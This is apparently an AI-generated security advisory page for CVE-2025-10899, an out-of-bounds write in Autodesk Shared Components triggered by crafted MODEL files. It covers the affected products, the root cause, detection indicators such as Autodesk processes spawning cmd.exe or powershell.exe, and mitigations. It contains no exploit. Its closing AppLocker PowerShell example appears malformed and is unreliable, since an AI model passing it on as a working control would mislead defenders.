CVE-2025-10899 Overview
CVE-2025-10899 is an out-of-bounds write vulnerability [CWE-787] affecting Autodesk Shared Components and a broad range of Autodesk products. The flaw is triggered when a maliciously crafted MODEL file is parsed by an affected Autodesk application. An attacker who convinces a user to open such a file can cause a crash, induce data corruption, or execute arbitrary code in the context of the current process. Exploitation requires local access and user interaction, since the victim must open the malicious file in a vulnerable Autodesk product.
Critical Impact
Arbitrary code execution in the context of the current user across AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, and other Autodesk 2026 products.
Affected Products
- Autodesk Shared Components, AutoCAD 2026, and AutoCAD verticals (Architecture, Electrical, Map 3D, Mechanical, MEP, Plant 3D)
- Autodesk Revit 2026, Revit LT 2026, Inventor 2026, 3ds Max 2026, Advance Steel 2026
- Autodesk Civil 3D 2026, Infraworks 2026, and Vault 2026
Discovery Timeline
- 2025-12-16 - CVE-2025-10899 published to NVD
- 2025-12-19 - Last updated in NVD database
Technical Details for CVE-2025-10899
Vulnerability Analysis
The vulnerability resides in the file-parsing logic shared across Autodesk products through the Shared Components library. When the parser processes a malformed MODEL file, it writes data beyond the bounds of an allocated buffer. This out-of-bounds write corrupts adjacent memory structures within the process address space. Depending on what is overwritten, the outcome ranges from an application crash to controlled corruption of function pointers or object metadata. An attacker who shapes the write primitive precisely can redirect execution and run code with the privileges of the user running the Autodesk application.
Because Shared Components is consumed by AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, and other Autodesk 2026 products, a single parser defect propagates across the product family. Engineering and architecture environments frequently exchange MODEL files between vendors, contractors, and clients, which expands the attack surface.
Root Cause
The root cause is missing or insufficient bounds validation when the MODEL file parser writes attacker-controlled data into a fixed-size buffer. Field length values or indices inside the file are trusted without verifying that the resulting write remains within the allocated region. This is a classic CWE-787 pattern.
Attack Vector
The attack requires local access and user interaction. An attacker delivers a crafted MODEL file through email, a shared project workspace, a contractor handoff, or a cloud storage link. When the user opens the file in an affected Autodesk product, the parser triggers the out-of-bounds write and exploitation completes in the context of the current process. No network access to the workstation is required.
No public proof-of-concept is associated with this CVE in the available references. Technical specifics are described in the Autodesk Security Advisory ADSK-SA-2025-0024.
Detection Methods for CVE-2025-10899
Indicators of Compromise
- Unexpected crashes of acad.exe, revit.exe, inventor.exe, 3dsmax.exe, or other Autodesk processes immediately after opening a MODEL file.
- MODEL files arriving from untrusted senders or external project shares, particularly those with anomalous size or structure.
- Autodesk processes spawning unexpected child processes such as cmd.exe, powershell.exe, or rundll32.exe.
Detection Strategies
- Monitor process telemetry for Autodesk application crashes correlated with recent file-open events involving MODEL files.
- Flag any child process creation from Autodesk binaries that deviates from a baseline of legitimate helper utilities.
- Inspect endpoint memory protection events (DEP, ASLR, CFG violations) originating from Autodesk processes.
Monitoring Recommendations
- Centralize endpoint logs from engineering workstations and alert on repeated Autodesk process termination events.
- Track inbound MODEL files via email and file-sharing gateways and apply attachment sandboxing where available.
- Maintain an inventory of Autodesk 2026 product versions installed across the environment to prioritize patch verification.
How to Mitigate CVE-2025-10899
Immediate Actions Required
- Apply the fixed builds referenced in Autodesk Security Advisory ADSK-SA-2025-0024 for every affected product in use.
- Instruct CAD and engineering users not to open MODEL files received from untrusted or unverified sources.
- Confirm that affected workstations run with standard user privileges rather than local administrator rights to limit exploitation impact.
Patch Information
Autodesk has published fixes through advisory ADSK-SA-2025-0024. Updates should be deployed using Autodesk Access or the standard enterprise deployment workflow. Confirm patched build numbers for each product, since Shared Components updates ship as part of individual product installers across AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, Infraworks, Vault, and the AutoCAD verticals.
Workarounds
- Restrict execution of Autodesk applications to vetted project directories and block opening of MODEL files from temporary or download folders.
- Use application allowlisting to prevent Autodesk processes from launching unexpected child binaries such as scripting hosts.
- Sandbox or detonate untrusted MODEL files in an isolated environment before distributing them to engineering teams.
# Example: block opening MODEL files from user Downloads via Windows AppLocker file path rule
New-AppLockerPolicy -RuleType Path -User Everyone -Action Deny \
-Path "%USERPROFILE%\Downloads\*.model" -RuleNamePrefix "Block-MODEL-Downloads"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
